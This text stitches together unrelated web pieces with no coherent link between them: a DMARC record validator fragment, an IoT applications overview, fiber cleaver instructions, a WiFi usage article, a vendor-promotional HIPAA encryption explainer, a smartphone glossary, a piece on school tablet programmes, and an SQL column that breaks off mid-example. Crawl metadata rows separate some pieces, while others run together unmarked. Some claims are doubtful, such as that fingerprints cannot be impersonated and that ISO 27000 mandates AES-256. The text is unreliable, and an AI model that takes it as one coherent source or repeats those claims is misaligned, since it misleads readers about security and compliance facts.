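    if not parts or parts[0] != "v=DMARC1":
        problems.append("record must begin with v=DMARC1")
    tags = dict(p.split("=", 1) for p in parts if "=" in p)
    if tags.get("p") not in ("none", "quarantine", "reject"):
        problems.append("p tag missing or not one of none/quarantine/reject")
    return problems
```

A full validator would also check optional tags such as rua, ruf, pct, and the alignment modes, but these two rules catch the most common publishing mistakes.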
SPF, DKIM, and DMARC records are crucial advancements in email authentication and email security. While SPF and DKIM records are the components the DMARC system builds on, DMARC provides a feature that they both lack: reporting. Thus, using a DMARC record, you can quickly get valuable, comprehensive reports on the email associated with a domain and its subdomains.
Whether you are a future-minded CEO, a tech-driven executive, or an IT leader, you’ve come across the term IoT before. It’s often used alongside superlatives about how it will revolutionize the way you work, play, and live. But is it just another buzzword, or is it the promised technological holy grail? The truth is that the Internet of Things (IoT) isn’t just one thing, but a methodology of planning, implementing, and using technology to achieve a wide-ranging list of benefits.
Table of contents
- IoT applications
- What is the Internet of Things?
- 9 Specific IoT applications
Combined with other technological disruptors, such as 5G, automation, and machine learning, the IoT transforms the way we do business and go about our lives.
So with that in mind, let’s take a deep dive into IoT and some of the practical applications already making an impact today.
What is the Internet of Things?
The IoT (Internet of Things) is a loose network of interconnected digital endpoints, such as consumer devices, networks, servers, applications, etc. While there is a huge variety of “Things” that make up the IoT, they all share the common trait of having the ability to transfer data over a network without requiring human-to-human or human-to-computer interaction.
To do this, each “thing” must, of course, be associated with a unique identifier (UID), such as an IP address, so it can be picked out from the ocean of other devices and endpoints. In its simplest form, an IoT ecosystem consists of two or more devices with the ability to collect data from their environment (users included). IoT devices can communicate this data to each other via an IoT gateway, or upload it to edge devices or the cloud to be processed and analyzed.
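In code terms, that minimal ecosystem (uniquely identified devices reporting data through a gateway without human interaction) can be sketched as an in-memory toy; all class and field names here are invented for illustration:

```python
import uuid

class SensorDevice:
    """A 'thing': it has a unique ID and can report data without human interaction."""
    def __init__(self, kind: str):
        self.uid = str(uuid.uuid4())  # unique identifier, analogous to an address
        self.kind = kind

    def read(self) -> dict:
        # A real device would sample hardware; here we return a fixed demo value.
        return {"uid": self.uid, "kind": self.kind, "value": 21.5}

class Gateway:
    """Collects readings locally before forwarding them to an edge node or the cloud."""
    def __init__(self):
        self.buffer = []

    def ingest(self, reading: dict):
        self.buffer.append(reading)

    def flush(self) -> list:
        batch, self.buffer = self.buffer, []
        return batch
```

In a real deployment the gateway's `flush` step would push the batch over a network protocol such as MQTT or HTTPS rather than returning it in-process.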
The IoT is ubiquitous, with specific applications, or “Things”, being developed to tackle specific needs across all sectors.
Businesses have realized the potential advantages of operating in a way that utilizes the IoT to their benefit, such as:
- Enhancing customer experiences
- Operating more efficiently
- Harnessing more (consumer) data
- Improving decision making
- Speeding up service delivery
- Increasing adoption rates among consumers
In less consumer-oriented contexts, the goals of IoT are similar but may shift toward:
- Improving employee productivity
- Enhancing visibility over processes and digital assets
- Improving access to real-time data
- Facilitating communication
An IoT ecosystem can be as complicated as mounted GPS systems on carrier fleet vehicles that communicate their locations to a central server. This server collates, organizes, and transfers the data to help coordinate assets, map or track routes, and provide decision-makers with the real-time data they need to make business-critical decisions.
Or, it may be as simple as your home Amazon Echo, Google Home, or Apple HomePod helping you buy groceries from an online marketplace.
9 Specific IoT applications
1. Health & life sciences
Undoubtedly the most widespread use and awareness of IoT applications in this space are attributable to consumer wearables. And today, the most popular and ubiquitous type of wearable is undoubtedly the smartwatch.
The Galaxy range from Samsung, the Apple Watch series, and the various Fitbit devices need little introduction. In the cases of the Galaxy Watch and Apple Watch devices, these are powerful productivity tools and an extension of your smartphone, with many of the same capabilities.
However, by far the most popular use for wearables is as fitness and activity trackers, spearheaded by companies like Fitbit.
The sophistication and features of these devices are growing by the year. From heart-rate monitors to sleep-quality trackers to GPS and built-in WiFi/5G, we’ve only scratched the surface. However, the future of wearables may lie in devices even more intrinsically linked with us through embedded technology, such as Neuralink.
2. Consumer and home
The smart home has long been an ideal of tech fanatics but is now slowly becoming a reality.
You can find smart versions of almost all household appliances, from washing machines to fridges to wardrobe mirrors. Check out World of IoT Consumer and Smart Home.
Not only can they provide advanced functionality not available in conventional systems, but they can be interconnected and controlled via a single point of contact.
For example, consumer home assistants such as Google Home, Apple HomePod, and Amazon Echo can integrate with numerous other home appliances. Others may come with their dedicated smartphone or computer apps. These applications range from practical to luxurious. For example, they can help in the maintenance and control of fire alarm systems, monitoring energy/water consumption, or help to maintain the perfect climate control throughout your home.
3. Transport & logistics
While we might still be some way off from completely eliminating your morning commute, traffic management is a field making great strides.
Most modern cars produced today are IoT devices in and of themselves with infotainment systems with features like seamless smartphone integration, GPS, and even internet connectivity.
Even by using apps like Google Maps and Waze, we are receiving information that makes our lives easier and sharing it with traffic monitoring systems.
However, we are also facing the advent of the “smart car,” pioneered by companies like Tesla. Automated vehicles might be the next step to achieve fully integrated traffic management systems.
4. Agriculture
Conventionally, we don’t think about farming and cutting-edge technology in the same vein.
Farmers are already using these technologies to gain access to unprecedented data and decision-making power.
For example, sensors that can detect various properties of the soil, such as moisture and acidity levels and nutrient availability, are already commonplace. This can help farmers determine which crops are best for the soil or to suitably prepare the soil. Similar devices can be used to gather and analyze data about the climate, short-term weather, etc.
Farmers can also benefit from a range of other IoT devices that span fleet tracking, inventory management, field observation, and even livestock monitoring. This has given rise to the discipline of “precision farming” and the concept of the “smart farm.”
5. Retail & hospitality
As an industry focused on providing the best user experiences possible, it’s only natural that this sector would also gravitate towards being more IoT-centric.
Electronic keys can be sent directly to your smartphone and used to open up hotel doors using QR codes. This can help reduce frustrating long check-in and check-out times as well as automate other interactions, such as ordering room service, requesting cleaning services, using the concierge, etc. This saves both the consumer’s and the host’s time and effort. Also, it eliminates many unnecessary human-to-human interactions.
IoT applications also give hospitality businesses unprecedented opportunities for personalised marketing, messaging, and tailored offers.
While not its originally intended purpose, these innovations are even more sensible in our post-pandemic world.
6. Energy-saving and the “Smart Grid”
This is not the only large-scale civil use of the IoT, but it has become one of the most topical.
Our collective conscience has never been more engaged regarding minimising our environmental footprint. Decreased and more efficient energy consumption is seen as one of the critical ways of achieving that goal.
From industrial power plants to communal city blocks, installing “smart” electricity meters with built-in sensors and IoT capability can help us more effectively monitor and control the flow of electricity.
The influx of data also helps improve predictive models about peak consumption times and other important trends. Furthermore, maintenance and repairs will be enhanced by more quickly and accurately detecting and identifying faults.
Consumer-facing applications can also provide individuals with the information to better understand and exercise more control over their consumption patterns.
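As a toy illustration of the monitoring side, a meter's stream of readings can be scanned for spikes against a simple moving baseline. The threshold, window size, and data below are invented for illustration and are not from any real smart-grid system:

```python
def flag_peaks(readings, window=3, factor=1.5):
    """Flag indices where a reading exceeds `factor` times the mean of the
    previous `window` readings: a crude stand-in for peak-demand detection."""
    peaks = []
    for i in range(window, len(readings)):
        baseline = sum(readings[i - window:i]) / window
        if readings[i] > factor * baseline:
            peaks.append(i)
    return peaks
```

For hourly kWh readings like `[1.0, 1.1, 0.9, 1.0, 4.0, 1.0]`, only the 4.0 kWh spike is flagged; production systems would use far richer models, but the idea of comparing live readings against an expected baseline is the same.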
7. Buildings & construction
IoT applications are also being uncovered throughout the entire lifecycle of construction and ongoing building maintenance. The aim of these applications is mainly to increase productivity and efficiency while reducing operational costs.
Examples of these systems are manifold:
- Electronic building access control with entry/exit tracking
- Sensors connected to electrical/water supply systems to track usage and potential faults
- Automation and monitoring of various systems, such as HVAC, smoke alarms, elevators, etc.
These systems can be used in both residential and commercial properties, such as malls or office buildings.
8. Industry
Recently, the Industrial sector has emerged as the top IoT application area.
This is a highly competitive space, and the IoT, combined with automation and machine learning, is helping organisations stay competitive by reducing operational costs and increasing productivity/efficiency.
Wearables and augmented reality are increasingly utilised to help the workforce be productive and improve human resource management. Operators also benefit significantly from enhanced shop-floor monitoring, including real-time data from production equipment and inventory management systems.
In recent years, there has been massive innovation in robotics and industrial exoskeletons that also improve safety and productivity. And, it will be interesting to see how this inevitably integrates with the larger IoT ecosystem.
9. Security & public safety
The number of applications for IoT in the sphere of security and public safety is almost too numerous to mention.
Regarding the protection of private or restricted property, users can benefit from improved monitoring and surveillance thanks to advanced environmental sensors, drones, and connected video camera systems.
Public servants, such as police, firefighters, and paramedics, can benefit from better access to real-time information as well as IoT technology built into their police cars, fire trucks, and ambulances. Automatic gunshot detectors and robotic explosive “sniffers” are just some of the ways this can be used to combat violent crime or in combat situations.
As far as we’ve progressed, it’s clear that we’ve only seen the tip of the iceberg in terms of the variety, capability, and impact of the IoT on our lives. When implemented in tandem with other advancements in AI, automation, and next-gen networking, it truly has the potential to drastically revolutionise the way we work and live.
The advent of 5G is particularly crucial to further adoption and innovation in the IoT space. The growth of these interconnected devices has caused a surge in our demand for high-speed, reliable, and broadband connectivity. This is particularly true if we’re to reap the full benefits of real-time data and accelerated decision-making promised by IoT applications.
In the world of fiber splicing, the fiber cleaver is an important tool that precisely cleaves the fibers to be spliced. It is the guarantee of a good splice, because the quality of the splice depends on the quality of the cleave. High-quality fiber breaks with clean end surfaces are the yardstick for good fiber cleavers. This article provides some basic knowledge about fiber cleavers.
In optical fiber work, a cleave is a controlled break that intentionally creates a perfectly flat end face perpendicular to the longitudinal axis of the fiber. Fiber optic cleavers are used in most production lines; a cleaver can give a precise cut at a cleave angle of 90 degrees to the fiber end. Cleavers are available for both single fibers and ribbon fibers.
Two kinds of fiber cleavers are commonly seen on the market. The first is the pen-shaped scribe cleaver, which looks like a ballpoint pen and has a small wedge tip made of diamond or another hard material. The scribe cleaver is a traditional, low-cost fiber cleaving tool using the scribe-and-pull method: the operator scribes the fiber manually and then pulls the fiber to break it. It is difficult to achieve high cleaving accuracy with this tool.
Therefore, to solve the accuracy problem, the precision cleaver was introduced to the industry. It may cost much more than a scribe cleaver, but working speed and efficiency are greatly improved, since multiple fibers can be cleaved at one time. With the extensive application of fusion splicers, precision cleavers are favored by operators who want to avoid splice loss.
The precision cleaver is a mechanical device that can look a little difficult for novices to deal with. Here are some simple steps you can follow when using one:
- Step one, open the fiber clamp.
- Step two, press down on the button and slide the carriage back.
- Step three, move the fiber slide back until it stops.
- Step four, clean the stripped fiber with a solution of greater than 91% isopropyl alcohol.
- Step five, place the stripped and cleaned fiber into the slot at the desired cleave length.
- Step six, while maintaining firm pressure on the buffer, move the fiber slide forward until it stops.
- Step seven, close the fiber clamp.
- Step eight, slide the carriage forward.
- Step nine, lift the fiber clamp.
- Step ten, move the fiber slide back.
- Step eleven, remove the fiber, which is now cleaved to the proper length.
- Step twelve, remove and properly dispose of the scrap fiber.
Make sure you comply with these precautions during the process of fiber cleaving:
- First, wear a pair of safety glasses. This can protect your eyes from accidental injury. It is highly recommended when handling chemicals and cleaving fiber.
- Second, be careful when using isopropyl alcohol. Keep it away from heat, sparks and open flame: isopropyl alcohol is flammable, with a flash point of 73°F. It can also cause eye irritation on contact; in case of eye contact, flush the eyes with water for at least 15 minutes. Moreover, inhaling fumes may induce mild narcosis. In case of ingestion, consult a physician.
- Third, store cleaved glass fibers properly. Cleaved glass fibers are very sharp and can pierce the skin easily. Do not let cut pieces of fiber stick to your clothing or drop in the work area, where they can cause injury later. Use tweezers to pick up cut or broken pieces of glass fiber and place them on a loop of tape kept for that purpose alone.
Having a qualified fiber cleaver enhances cleaving precision and efficiency. Nowadays, the precision cleaver is widely applied in accurate fusion splicing, and proper investment is valuable for long-term applications. If you want to get one for your project, FS.COM is a good place to go.
Consumers use lots of data on their mobile devices. While half of consumers use less than 7 GB per month, data consumption is heavily skewed toward the upper end, recent Parks Associates research indicates. Among U.S. broadband households, mean data consumption is roughly 20 GB per month, with 14 GB used on WiFi and 6 GB through 3G/4G/LTE networks.
Consumers’ monthly WiFi data consumption increased by 40 percent from 2015 to 2016. While data use overall has been increasing, WiFi use has been increasing faster than mobile data. The use of WiFi is strongly correlated with the use of 4G/LTE data. As use of one increases, so does use of the other.
Even unlimited data plan holders use WiFi; one-quarter of them use more than 15 GB of WiFi data per month, based on Parks’ findings. This implies that there is a “data-hungry” type of mobile user, composed of those who want to consume video content and other data-heavy services and are not particular about the kind of connection they use.
In the Home
In the U.S., about 75 percent of broadband households use a home WiFi network, which equals 76 million home WiFi access points. Consumers can make their WiFi Internet connections in a number of ways — through DSL or fiber-optic broadband from a telephone company, cable high-speed Internet from a cable provider, satellite Internet from a satellite provider, or, increasingly, through WiFi hotspots powered by a device accessing a 3G/4G mobile network.
In addition to these more established WiFi solutions, fixed wireless broadband is beginning to emerge as a viable and robust technology. Fixed wireless broadband traditionally has offered last-mile service over a wireless connection using high-frequency radio signals. The older technology typically was limited to 10 Mbps of network bandwidth, required line-of-sight access between the subscriber and a ground station, and suffered from attenuation in rain and fog.
However, newer experiments in the mmWave band, done in anticipation of 5G, have solved these issues to a large extent, allowing fixed wireless broadband to expand beyond its traditional offering.
Starry, a wireless startup, can deliver Gigabit-class Internet to the home over a distance of 1KM to 1.5 KM using mmWave technology in the 39-GHz band. Both Verizon and AT&T plan to launch a precommercial 5G network for fixed wireless service using mmWave spectrum later this year.
Out and About
WiFi use outside of the home also is popular with consumers. In most countries, the home WiFi and public hotspots are two different services. However, in the UK and a small number of European countries, a home WiFi router can broadcast two signals — one for the homeowner’s private use and the other for public use.
This hybrid model is made possible by the latest WiFi hotspot standards, which partition the WiFi channels into public and private use. Through this kind of technology, public WiFi hotspot numbers are increased dramatically in these countries, a benefit appreciated by wholesale and retail customers.
The U.S. market may not be well suited for this WiFi use case, because public WiFi hotspots in U.S. residential areas don’t attract many users. Comcast most recently launched its long-anticipated Xfinity mobile service, highlighting its WiFi footprint of 16 million access points. This figure appears to include its home hotspots in the residential area.
Time will tell how such home hotspots are being used, and whether such use can translate into meaningful subscriber gain for Comcast or other cable multiple system operators with similar WiFi assets.
Consumers’ appetite for mobile data will continue to increase at a faster speed, no matter the location, based on Parks’ research.
Monthly consumption of mobile data will top 49 exabytes, up from 7.2 exabytes recorded in December 2016, according to Cisco.
While mobile networks will be upgraded by then, this data tsunami nevertheless will pressure-test a mobile network’s limits, and offloading solutions like WiFi are expected to play an important role in mobile operators’ network densification strategy. | <urn:uuid:83c60df0-8ce7-4e51-bbc4-2dc7c98467c7> | CC-MAIN-2022-40 | https://www.linuxinsider.com/story/consumer-wifi-use-no-letup-in-sight-84520.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00555.warc.gz | en | 0.933357 | 852 | 2.640625 | 3 |
Understanding the HIPAA Encryption Requirement
In its original form, the Health Insurance Portability and Accountability Act (HIPAA) was intended to protect patient health information (PHI) privacy. Since the law was enacted in 1996 and as healthcare organizations changed their operating models to incorporate digital data sharing, the government encouraged interoperability for better patient care, and HIPAA expanded beyond paper files to include electronic PHI (ePHI).
Additionally, as these digital data sharing models continued to grow, so too did the types of organizations covered by HIPAA. Today, healthcare organizations and their business associates need to meet stringent compliance requirements to avoid hefty fines levied by the Department of Health and Human Services (HHS), the agency enforcing HIPAA compliance. Understanding the HIPAA encryption requirements gives healthcare organizations and their business associates a way to protect privacy for data both in-transit and at-rest.
Does HIPAA require encryption?
HIPAA consists of four separate “rules,” the Privacy Rule, Security Rule, Enforcement Rule, and Breach Notification Rule. In response to the increased digitalization of patient data, HHS announced a final Omnibus Rule in 2013, implementing additional provisions from the Health Information Technology for Economic and Clinical Health Act (HITECH).
Fitting the different pieces of HIPAA together can be daunting because the requirements are listed in various documents aggregated across over twenty years.
Encryption, while not technically “required” by either HIPAA or HITECH, is considered an “addressable” control. Addressable does not mean the control is optional, but it does mean that a covered entity can determine whether an implementation is reasonable and appropriate. If the organization determines that an “addressable” control is not reasonable and appropriate, then it must find an alternative compensating control that is reasonable and appropriate to meet the addressable control’s purpose.
Security Rule Requirements
The Security Rule is divided into administrative, technical, and physical safeguards. Under Security Rule technical safeguards, HIPAA notes that encryption and decryption are addressable implementations as part of the access and transmission security measures.
Connection to National Institute of Standards and Technology (NIST)
Increasingly, healthcare organizations, business associates, and patients turned to electronic data sharing models. In 2014, NIST released its Cybersecurity Framework (NIST CSF) and in 2016 published the “HIPAA Security Rule Crosswalk to NIST Cybersecurity Framework”. The document maps HIPAA Security Rule standards and implementations to NIST CSF subcategories while also cross-mapping to additional frameworks such as the International Organization for Standardization (ISO), Control Objectives for Information and Related Technology (COBIT), and Council on Cybersecurity Critical Security Controls (CCS CSC). The Crosswalk document includes the following:
- PR.DS-1: Data-at-rest is protected
- PR.DS-2: Data-in-transit is protected.
The Crosswalk then aligns across various “relevant control mappings,” including CCS CSC, COBIT, ISO 27001:2013, NIST SP 800-53, and HIPAA Security Rule. Since 2016, several of these control mappings have changed. For example, CCS CSC is now called the Center for Internet Security (CIS) controls while COBIT and ISO 27000 have both been updated.
Thus, while HIPAA may not specifically require encryption, the intersection between the related control mappings and the need to protect data-at-rest and data-in-transit indicates that encryption would be considered a best practice.
What level of encryption is required for HIPAA?
With the intricate level of cross-mapping between the different compliance requirements, the level of encryption required to comply with HIPAA and HITECH can be overwhelming. For example:
- Subcontrol 15.7: Leverage the Advanced Encryption Standard (AES) to Encrypt Wireless Data
- Subcontrol 18.5: Use only Standardized and Extensively Reviewed Encryption Algorithms
- ISO 27000: AES-256 encryption
- NIST 800-53 SC-12 Cryptographic Key Establishment and Management: establish and manage cryptographic keys for required cryptography employed within the information system.
Of the listed controls, only ISO 27000 applies a specific encryption standard, AES-256 encryption, which is currently considered the strongest level of encryption.
Is end-to-end encryption HIPAA compliant?
Experts consider end-to-end encryption (E2EE) the most secure way to share data electronically. With E2EE, data is encrypted both on the user’s device (at-rest) and as it travels to another end user (in-transit). This protects information and enables HIPAA compliance in several ways:
- Lost devices: Even if a device is lost, the at-rest encryption ensures that information is not readable.
- Cloud storage: Even if cybercriminals gain unauthorized access, the data will be unreadable.
- Data sharing: Even if a cybercriminal manages to execute a man-in-the-middle attack successfully, the data will be unreadable.
- Accidental access: Even if an authorized user gains access to data without the appropriate decryption, the data will be unreadable.
With E2EE, health organizations and business associates can better protect data. With easy-to-deploy and use encryption solutions, E2EE is a reasonable and appropriate data-in-transit and data-at-rest protection implementation.
How end-to-end encryption enables secure telehealth
The rise of telehealth as part of healthcare’s response to the COVID-19 stay-at-home orders increases the value of E2EE. Moreover, many healthcare providers will likely continue to engage in telehealth practices in the post-COVID era. However, cybercriminals continue to deploy attacks against telehealth providers. According to research, IT staff at the most popular telehealth application found a 30% increase overall in security alerts, indicating increased cybercriminal attack attempts.
With telehealth likely to be integrated into traditional healthcare, providers and business associates should look for solutions that protect data and enable HIPAA compliance. To maintain various administrative tasks, including follow-up calls or billing, employees may share documents using collaborative tools or email. Moreover, as the healthcare industry continues to evolve its telehealth practices, documents and other files containing ePHI may need to be circulated among practitioners. For example, a practitioner may keep a list of patients with outstanding bills in a spreadsheet. Sharing the spreadsheet via email becomes a privacy and security risk for two reasons. First, cybercriminals may attempt to intercept the communication. Second, an employee may accidentally email the spreadsheet to an incorrect email address. E2EE can mitigate the risks associated with both of these hypotheticals.
Atakama: Easy end-to-end encryption for healthcare organizations and business associates
As healthcare organizations and business associates look to continue telehealth practices, E2EE becomes a fundamental control for mitigating security and privacy risks. Unfortunately, many encryption tools can be cumbersome to deploy and difficult for end-users, ultimately leaving data unprotected when users circumvent encryption policies.
Atakama’s encrypted file transfer solution enables HIPAA compliance with an easy-to-use approach that increases end-user adoption rates. Atakama protects files with AES-256 standard encryption. Unlike traditional tools that require passwords for decrypting data, Atakama’s solution pushes an approval request to the sender’s device, giving the sender the ability to accept or deny the decryption request. Since senders need to approve the decryption request, Atakama ensures that data remains encrypted end-to-end and does so without placing a burden on the users.
Additionally, with Atakama’s Application Level Database Encryption solution, organizations can secure data-at-rest on their servers and data-in-transit when accessed through an application. Atakama’s solution encrypts data within an application, as it is entered and before being transmitted to the database. When users approve a data request, the data is decrypted making non-public sensitive data viewable while still encrypted. This process ensures that data remains encrypted on the server at all times, decrypted only for the particular user within their browser when they call the information.
For more information about how Atakama can enable your organization’s long-term telehealth goals, contact us for a demo today. | <urn:uuid:814f2c61-5cb3-4a8d-a33f-4996982a512c> | CC-MAIN-2022-40 | https://news.atakama.com/understanding-the-hipaa-encryption-requirement | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335424.32/warc/CC-MAIN-20220930020521-20220930050521-00555.warc.gz | en | 0.904098 | 1,774 | 2.515625 | 3 |
Smartphones are evolving, bringing new technical jargon that you need to know. That’s why we’ve created this handy guide, explaining all the specialist terms that you need to know for a successful future in the mobile hardware industry. Following our Connectivity and IP Communications guides, we have compiled a list of everything you need to know about smartphones!
4G is short for fourth generation broadband cellular network technology. It’s what allows customers outside of WiFi to make calls, send texts and use data. Most devices on the market will currently be 4G enabled.
5G is the next generation of mobile connectivity that will give customers greater speeds than 4G. It was first introduced in May 2019 and will have a huge impact on the way we live and work. The number of 5G ready devices is beginning to expand and they will eventually be the default.
AMOLED is a display technology and stands for Active Matrix Organic Light Emitting Diodes. It is a type of OLED display used in smartphones. HD+ Dynamic AMOLED technology ensures a crisp, vibrant viewing experience, as seen on devices such as the Galaxy S20 Ultra from Samsung.
Android is a mobile operating system from Google. The key difference between Android and Apple’s OS is Android is open source, meaning developers can modify and customise the OS for each phone.
Aperture is essentially an opening of the camera lens through which light passes. The more light that passes through, the sharper the image. It is usually measured in F-stops and has a direct bearing on the detailing and contrast of the photograph. The ability to set the aperture on a smartphone camera is relatively new.
A bezel is the border between the phone’s screen and frame. Modern smartphones often come with a smaller bezel, allowing for more screen real estate.
Bluetooth is a wireless technology standard used for exchanging data, such as media files, between mobile devices. It operates over short distances using radio waves. In mobile device terms, it is now permitting file share and connectivity to external devices, such as wireless speakers or headphones.
A dual lens set up on a smartphone simply means there is two lenses instead of one. In most phones it combines wide-angle and telephoto configuration.
A dual-sim device is simply a device that can operate two separate sim cards concurrently. This is useful for users wanting two distinct numbers while only needing one device. For example having two separate SIMs for business and personal use, on one phone.
In smartphone terms, a device that is dustproof is simply resistant to dust, meaning it won’t be affected by particles infiltrating the crevices of the phone. This is a standard feature of many rugged phones.
A drop-proof device is simply a phone that is resistant to damage when dropped. The phone drop test is an industry standard method for measuring how drop-proof a phone is.
Facial Recognition Technology
Commonly known as Face ID on Apple Devices, or Face Unlock on others, facial recognition technology uses biometrics to map facial features and verify users. It is commonly used to unlock phones and authorise payments.
Fingerprint scanners work as you would expect, reading a user’s fingerprint in order to unlock phones, make purchases and confirm downloads. It is known as Touch ID on iPhones and is argued to be more secure than facial recognition technology on smartphones as fingerprints cannot be impersonated.
Gorilla Glass is a brand of chemically strengthened glass developed and manufactured by Corning. It is often used in screen protectors to help reduce scratches and cracks in the device screen.
The Global Positioning System (GPS) is a satellite-based navigation system made up of at least 24 satellites. In smartphones, it allows people to navigate their journey in maps, as well as capturing location data for personalised offers.
High Dynamic Range (HDR)
High Dynamic Range, or HDR, is a common feature on both iOS and Android phones. It helps users take better quality photos by capturing multiple photos at different exposures – darker, normal and lighter, with just one tap of a button. It then merges them into one image so none of the detail is lost. This means highlights get brighter and shadows get darker giving users a high quality final image.
iOS is the mobile operating system created and developed by Apple, used on iPhones and iPads.
An IP rating, or Ingress Protection Rating, classifies the degrees of protection against both solids and liquids in electrical enclosures, such as smartphones and tablets. IP ratings are specified on a number of devices currently in market.
mAh is milliampere Hour which measures electric power over time. The higher the mAh set against a battery on a smartphone, the longer it will last through the day.
MMS is an acronym for Multimedia Messaging Service, a standard way to send text messages that include multimedia content to and from a mobile device over a cellular network.
NFC stands for Near Field Communication and enables short-range communication between compatible devices. It enables tap-and-go services, such as Apple and Google Pay.
Unlike other screen technologies, OLED, or Organic Light Emitting Diode, uses organic compounds to create colours. Each colour represented on the screen has a different mixture of elements. Many smartphones now utilise an OLED display to make images, videos and icons look crisp and vibrant.
Optical Image Stabilisation, or OIS, is a common reference point for smartphone manufacturers when it comes to the camera. With OIS, part of the lens physically moves to counteract any camera slight movement when taking a picture, reducing the effect of shaky hands and helping to prevent blurry images.
Portrait Mode uses depth of field to determine how much of the photograph is in focus. This feature results in photos with blurred backgrounds and sharper focus on the subject.
SMS is an acronym for Short Message Service. It is the most widely used type of text messaging carried over a cellular network.
An ultra-wide camera lens allows users to capture more in their photos. It displays a wider field of view than our own vision, with as much as 123 degrees promised on selected smartphones. It’s perfect for users who want to capture more in a single shot.
Waterproof technology allows devices to survive in the wettest conditions. The industry standard Ingress Protection (IP) rating system proves devices can handle complete submersion in water. IP68 waterproof phones are the most reliable to use in water, whether in the rain or fully submerged.
A WiFi hotspot is an area with an accessible wireless network. | <urn:uuid:19a421ef-e36d-465d-815b-5e93033c8ce6> | CC-MAIN-2022-40 | https://digitalwholesalesolutions.com/2020/03/it-telecoms-jargon-buster-smartphones/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00555.warc.gz | en | 0.916684 | 1,448 | 2.890625 | 3 |
Technology has the potential to transform the way we live our lives. Already we are seeing changes in the way we work, play, and interact on a social level as a direct result of developing technology. Now it is influencing the way we teach, too. The 1:1 implementation strategy involves equipping each pupil with a tablet or portable device, effectively giving them their own personal workstation from which to write, research, and learn.
The 1:1 implementation strategy offers the potential for schools to transform education, but if you are going to maximize these gains you must first take stock and analyze the hows and whys of its benefits.
Here are three essential aspects:
1. Choosing the Right Device
While every school shares the end goal of educating its pupils, methods and educational priorities can vary wildly between establishments. As typically traditional installations, many schools will have accrued a range of habits and routines established over long years of teaching. It is therefore important to choose the most suitable model when deciding to equip your pupils with devices.
There is a staggering array of notebooks, tablets, iPads and e-readers available on a constantly growing market. Devices can vary according to brand or intended application. Have you picked a reading device, or one that your pupils can actively work on? For 1:1 implementation, it will need to be the latter. What apps does it support, and does it have sufficient memory? Choosing the device that best complements your school’s practices can be challenging.
How Should You Decide?
You are under no obligation to make the decision alone. Ask teaching staff for their input, as they are responsible for interacting with the pupils in the classroom. They will also be responsible for overseeing and engaging the pupils with the new devices, so their opinions and preferences are critical.
Parental input should also be considered. It is their children who will be using the devices. What are their privacy concerns? Are the devices protected against improper use? And if you are expecting parents to contribute to payment or insurance costs, what are their financial boundaries?
2. Examine Costs
Costs is always a factor when it comes to technology. The device needs to be affordable; for example, most school budgets will not accommodate for the purchase of two thousand state-of-the-art iPads. Moreover, school children do not need to learn on state-of-the-art devices. Find a compromise between quality and cost. Research devices by appropriate attributes such as durability, memory, and transportability rather than big brand names and aesthetics. Accidents happen, especially in the hands of school children. Value practicality.
Aside from the initial cost, there are insurance and repair expenses to consider. You might want to establish charges for lost or damaged devices, although these will rarely cover the cost the device itself. Technology is valuable, and when treated flippantly can be a huge sinkhole in your finances. Taking the time to plan and analyze your expenditures is critical to successful 1:1 implementation.
3. Impact on Teaching Staff
As an arena typically dominated by tradition, reactions to technological innovation can vary. Many staff will welcome the implementation of devices in the classroom, recognizing their potential for increased efficiency, better learning, and improved classroom interaction. However, other staff members might react with hesitation.
Everyone’s teaching methods are different, and everyone has varying levels of technical understanding. A teacher who does not feel comfortable with their own computing knowledge is going to experience hesitation, even resistance, at the thought of having to lead a classroom full of such devices. They might also wonder how the implementation of such devices affects their teaching schedule. This is why it is so important to communicate with, train, and prepare your teaching staff before the use of the devices goes live.
Preparation and Support
Upskilling your staff is one of the easiest and most efficient ways of integrating technology into the classroom. Consider hiring an information and communications technology professional who can fulfill this role by supporting and training your staff.
Teachers who understand how a device works will understand its wider implications for the classroom. They will be able to identify how the technology can be used to complement their curriculum and implement it accordingly. Their technical knowledge will have increased, but also their confidence in the classroom and their attitude toward the technology itself. This will carry over to their pupils.
When implemented correctly, 1:1 implementation can have a transformative effect on classrooms, bringing education to life in a way that has never been possible before now. By carefully considering your approach to technological integration, you will be able to turn your school into a digital web of information, ideas, work shared, and dreams made.
To talk to iSupport about how we can help you improve your business’s IT support, call us at (888) 494-7638 or contact us here. | <urn:uuid:af66d95b-dd74-4708-aee2-d36cfea9b22e> | CC-MAIN-2022-40 | https://www.isupport.com/blog/the-essential-components-of-successful-11-implementation/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00555.warc.gz | en | 0.9581 | 989 | 3.171875 | 3 |
The SPACE Function Takes Up a Lot of Space
October 18, 2006 Hey, Ted
I have to build a file for input to another system. All fields are fixed-length, and numeric values are to be edited and right-adjusted. SQL’s CHAR function takes care of the editing requirement, but the result is left-adjusted. How do I right-adjust an edited numeric value? Or will I have to rewrite my program using native I/O operations?
On the surface, this seemed like an easy request. It turned to be a little more complicated than I had thought.
I suggested Sarah use the SPACE function to generate enough leading blanks to force right alignment. For example, the following expression right-adjusts an edited version of field ABUBAL within an area of twenty bytes.
SELECT space(20 - length(trim(char(ABUBAL))))||trim(char(ABUBAL)), ...
The SPACE function takes one argument–the number of spaces to be generated. Suppose that the edited ABUBAL occupies seven bytes. SPACE returns 13 blanks, which are concatenated to the edited ABUBAL.
IMHO, this expression deserves its own spot in the county landfill. However, it works. Well, it works up to a point. Here was Sarah’s final query.
